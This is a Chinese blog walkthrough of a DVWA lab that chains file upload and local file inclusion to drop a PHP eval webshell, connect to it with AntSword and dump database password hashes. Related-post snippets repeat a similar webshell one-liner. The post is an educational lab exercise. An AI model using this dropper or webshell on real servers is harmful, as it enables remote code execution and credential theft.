蚁剑+DVWA“文件包含”漏洞(File Inclusion + Upload 漏洞)

最新推荐文章于 2025-04-02 19:51:51 发布
最新推荐文章于 2025-04-02 19:51:51 发布
阅读量2.4k 收藏 9
点赞数 1
文章标签: 蚁剑 DVWA 文件包含 File Inclusion
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42342141/article/details/102824083
版权

一、实验环境+工具

环境搭建:

  • VMware Workstation

  • OWASP-bwa

工具

  • AntSword

二、具体步骤演示

2.1 打开虚拟机并登入 DVWA

在这里插入图片描述这次还是在 low等级下 (其他 security 只是绕过问题,不影响操作解释)

解释 文件包含 include 
在C语言中文件包含是指一个源文件可以将另一个源文件的全部内容包含进来。
该命令的作用是在预编译时,将指定源文件的内容复制到当前文件中。
文件包含是C语言预处理命令三个内容之一。

写过C的应该知道  C里面的代码 一般都有 include<file> 
这就是 包含
通俗点讲,就是系统会编译文件里的内容 include->执行

2.2 通过 Upload 上传一个 .txt 文件

这不是一个普通的txt文件,里面其实包含了一句话木马
在这里插入图片描述

<?fputs(fopen("shell01.php","w"),'<?php @eval($_POST[caidao]);?>')?>
这句话的意思是,我们先打开或新建一个 shell01.php 的文件
然后在php文件里写入  <?php @eval($_POST[caidao]);?>  这条语句

在这里插入图片描述
上传完成后,可以去服务器上传漏洞文件目录下 看看是否有test.txt文件
在这里插入图片描述
这里,其实我们也可以通过网页查看

文件上传目录: /var/www/dvwa/hackable/uploads
文件包含的目录: /var/www/dvwa/vulnerabilities/fi

在这里插入图片描述

2.3 通过 File Inclusion 来编译 test.txt 里的一句话木马

链接:http://192.168.47.130/dvwa/vulnerabilities/fi/?page=/var/www/dvwa/hackable/uploads/test.txt
在文件包含页面url的基础上 将 include.php 换成 test.txt 的路径

在这里插入图片描述
访问页面成这样 (属于正常现象)
**去服务器目录下看是否生成了 shell01.php **
此时去的是文件包含的文件目录下

/var/www/dvwa/vulnerabilities/fi

在这里插入图片描述
发现成功生成
为了确保 我们可以 more shell01.php 查看是否含有一句话木马

2.4 通过蚁剑去连接访问 shell01.php

这里我就不详写了哈,这和前面写过的 upload 漏洞类似 
参考转: https://blog.youkuaiyun.com/qq_42342141/article/details/102815402

在这里插入图片描述

2.5 e.g.数据库操作

右键 --> 数据库操作
在这里插入图片描述
添加 --> 填写信息–>添加
在这里插入图片描述

选择要管理的数据库类型。对于 MySQL 数据库,选择时依据如下:
MySQL (PHP < 5.5.0)
MYSQLI(PHP >= 5.2.9)

查看php版本 : php -version

在这里插入图片描述
在这里插入图片描述
至此成功拿到服务器数据库了!!!
利用相关的查询语句可以看到某些重要信息
MD5解密即可得到登入密码!!!
在这里插入图片描述

以上仅用于学习,不可用于恶意意图!

初学者L_言
关注
文件包含漏洞(原理、挖掘与利用、DVWA 文件包含部分)
m0_61506558的博客
08-06 785
在bilibili里面底部的代码是不变的。包含内容包含页头、页脚包含函数 公共函数减少重复代码、便于维护1.2 问题可能会导致允许访问敏感文件或者执行恶意代 码,造成漏洞1.3 分类1.3.1 本地文件包含漏洞LFI目录遍历漏洞任意文件访问漏洞固定包含通过接口动态包含包含恶意代码或图片马包含敏感文件1.3.2 远程文件包含漏洞漏洞描述原因后果XXEXML外部实体注入使用XML参数数据,并且可以解析外部实体导致访问敏感文件、探测端口、执行系统命名SSRF。......
DVWA -File Upload-通关教程-完结
刘箫-技术库
04-07 2452
这行代码检查上传文件的类型和大小是否符合要求,并使用 getimagesize() 函数验证上传文件是否为有效的图像文件。但是此时是不能用连接的,因为的原理是向上传文件发送包含参数的 post 请求,通过控制参数来执行不同的命令。如果上传文件不是 JPEG 或 PNG 格式,或者文件大小超过 100KB,则输出错误消息,指示上传的文件不符合要求。这段 PHP 代码是一个简单的文件上传处理程序,它接受通过 POST 请求上传的文件,并将其保存到指定的目录中。如果收到了该请求,说明用户尝试上传文件。
DVWA靶机从渗透到控制(weevely和中国)
Liu_Bruce的博客
01-07 1133
本文将详细介绍如何使用Weevely工具对运行在Ubuntu系统上的DVWA(Damn Vulnerable Web Application)进行渗透测试。我们将通过一个具体的实例,展示如何利用Weevely实现对低安全等级的DVWA靶机的攻击,并最终获取系统的控制权。实验环境为:靶机IP 192.168.1.37,攻击机Kali Linux IP 10.211.55.29。Weevely是一款基于Python编写的轻量级Webshell管理工具,广泛应用于渗透测试中。
文件包含————ctfhub文件包含(利用或者eval)
qq_45655564的博客
05-29 1153
include()函数 include()/require()/include_once()/require_once()参数可控的情况下,如导入为非.php文件,则仍按照php语法进行解析,这是include()函数所决定的。 CTFHUB之文件包含 进入页面是这个样子的 <?php error_reporting(0); if (isset($_GET['file'])) { if (!strpos($_GET["file"], "flag")) {#该字符串第一次出现的位置
如何解决返回数据为空(已成功解决)
最新发布
m0_73812072的博客
04-02 1044
因此正常只要大家正常下载的话,是不需要修改什么编码,还有什么代理之类的,直接用我这个方法就能解决!
代码执行漏洞 + antsword()调试应用
weixin_47306547的博客
09-12 3920
代码执行漏洞概述 概念:代码执行漏洞是指应用程序本身过滤不严,攻击者可以通过请求将代码注入到应用中,最终在web服务器上去执行。类似我们常见的SQL注入,是将SQL语句带入数据库查询,而我们的代码注入,则是将代码注入到脚本中让应用对代码进行解析,其危害直接相当于一个WEB后门的存在!远程代码执行实际上就是调用服务器网站代码进行执行。 代码执行漏洞成因 由于服务端存在执行的函数,在使用的过程中没有做好一个严格的控制,造成了实际的参数在客户端中可控 代码执行漏洞的危害 执行任意代码 向网站写WebS
Burpsuite、中国、XSS漏洞利用及常见问题
b312738566的博客
12-10 1344
3.启动中国(以管理员身份)
DVWA-文件上传与文件包含
qq_60848021的博客
06-23 3528
1,代码分析: 从以上代码可以看出并没有做任何限制,先用最简单的PHP一句话代码试下: 使用中国进行连接 扩展:使用中国连接出现以下情况是路径地址错误 出现”返回数据为空“,是代码有错误;basename()函数:返回带有文件扩展名的文件名部分。例如:/xx/test.php,返回test.php代码分析:继续上传yjh.php,使用BP进行抓包,更改文件类型扩展:[$_FILES’userfile’][‘name’]客户端机器文件的原名称。[$_FILES’userfile’][‘type
pikachu练习——file inclusion文件包含漏洞
haoaaao的博客
01-26 1363
一、file inclusion(local)???????? 1、在文件上传漏洞的getimagesize中上传拼接的111shell2.jpg文件 (1)这是文件url路径 http://192.168.1.32:8083/vul/unsafeupload/getimagesize.php (2)这是题中所给图片保存路径: uploads/2022/01/25/63414861efd573ba090720236716.jpg (3)将二者拼接 http://192.168.1.32:8
+DVWA(文件上传漏洞Upload
初学者L_言的博客
10-30 6853
+DVWA(文件上传漏洞Upload) 工具 虚拟机:owasp-bwa 主机:windows10 AntSword 文件上传漏洞Upload) 第一步:登入DVWA 注:这里使用的是low等级,毕竟目的是演示如何的连接 第二步:准备hack.php <?php @eval($_POST['hack']) ?> 第三步:从DVWA上传hack.php 显示上传成功!...
DVWA文件包含漏洞File Inclusion
qq_54537919的博客
06-27 1225
DVWA文件包含漏洞File Inclusion
DVWA通关--文件包含(File Inclusion)
箭雨镜屋
01-13 4583
LOW 通关步骤 一、本地文件包含 1、先搞清楚要干啥,当然可以像DVWA通关--文件上传(File Upload)的HIGH关一样,结合文件上传漏洞,包含木马,但是总做一样的事情未免有点没意思。 点右下角的View Help看了一下,File Inclusion这套关卡要求读取../hackable/flags/fi.php这个文件中的5个引用,也就是5个名言名句。 这个是本地文件包含的要求,后面也会一并尝试远程文件包含。 我在服务器上面看了一下这个文件的内容,如下图 可见1、2、4是直
dvwa靶场文件上传--high难度--连接
2401_85397851的博客
08-01 1255
选择DVWA Security,把impossible改成high(其他模式也改成high),改好之后再选择File Upload,如果把安全等级调成高了以后,我们只能上传像jpg,png,jpeg(这种后缀的)的图片,而且注意,上传的高度不能超过100KB,如果想要了解的,可以查看网页源代码或者看一下。如果损坏是传不上去的。
java实现对txt文件读入,替换部分文字后写出到另一个文件
nkymxx123456的博客
06-14 1771
package com; import java.io.*; public class test { public static void Test(String oldfilePath,String newfilePath){ File file = new File(oldfilePath); //判断文件存在并且是文件 Boolean boo = file.exists()&&file.isFile(); System.out.println(boo);
DVWA文件包含漏洞
weixin_56306210的博客
05-11 2108
DVWA文件包含漏洞
文件上传漏洞
m0_73452266的博客
06-27 588
文件上传漏洞的原理,木马的知识,前端,后端和服务器配置漏洞的文件上传绕过
DVWA--File Inclusion(文件包含)--四个级别
1stPeak's Blog
10-29 1512
文件包含,主要由于php.ini配置不严格,allow_url_fopen=On是导致文件包含的元凶之一 和php函数运用的严谨程度 php文件包含常用函数: Include: 包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行 Require: 跟include唯一不同的是,当产生错误时候,include会继续运行而require停止运行 Inc...
关于(AntSword)的溯源反制
Welcome To Myon'Blog !
12-30 1454
如果攻击者再次连接或者进入shell,则会报错,并且反弹一个shell给我们在1971端口上,我们可以利用该shell执行命令等,甚至溯源到对方的外网ip。如果我们发现了这个shell,我们该如何反击呢?以物理机为攻击机,虚拟机kali模拟受害者,之后使用kali进行溯源反制。最开始以为是系统问题,于是全换成Windows系统测试,依旧未成功。启用kali的Apache服务,用于模拟一个对外开放的服务。(我不清楚是否是我版本的问题还是什么问题)我这里使用的版本是2.1.15的(
文件包含漏洞
qq_55213436的博客
03-27 5121
一、前言 把可重复使用函数写入到单个文件中,在使用该函数,直接调用此文件,无需编写函数,这一调用文件的过程被称为包含。文件包含漏洞是一种常见的web类型漏洞,因为很多脚本语言支持使用文件包含,也就是我们所说的文件包含函数,网站开发者经常会把一些代码插入到指定的地方,从而节省之间避免再次编写 ,这就是包含函数的基础解释 ,但是我们不光可以包含我们预先指定的文件,也可以包含我们服务器内部的其他文件,前提条件就是我们需要有可读的权限才能读取这些文件 ,所以这样就会导致文件包含漏洞。 二、文件包含...
dvwa文件包含漏洞思路
07-12
DVWA (Damn Vulnerable Web Application) 是一个开源的安全学习平台,它包含了各种常见的Web应用程序漏洞,用于帮助安全从业人员、学生和开发者了解和测试如何防御这些漏洞dvwa 文件中的漏洞主要包括: 1. SQL注入漏洞:通过构造恶意SQL查询,试图访问或修改数据库中的数据,如`vuln-sqli.php`。 2. 跨站脚本攻击(XSS):攻击者将恶意脚本插入到网页上,当用户浏览该页面时执行,如`xss-vectors.php`。 3. 上传目录遍历(目录遍历)漏洞:允许攻击者利用文件上传功能获取服务器的敏感文件,如`file-uploads/upload.php`。 4. 文件包含漏洞:程序错误地包括了外部文件的内容,如果这个外部文件可以被篡改,就可能导致攻击,如`remote-file-inclusion/vulnerable1.php`。 理解这些漏洞的原理后,通常步骤包括: - 执行漏洞检测工具或手动分析代码路径 - 构造对应的数据包触发漏洞 - 观察系统响应或验证预期结果是否出现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值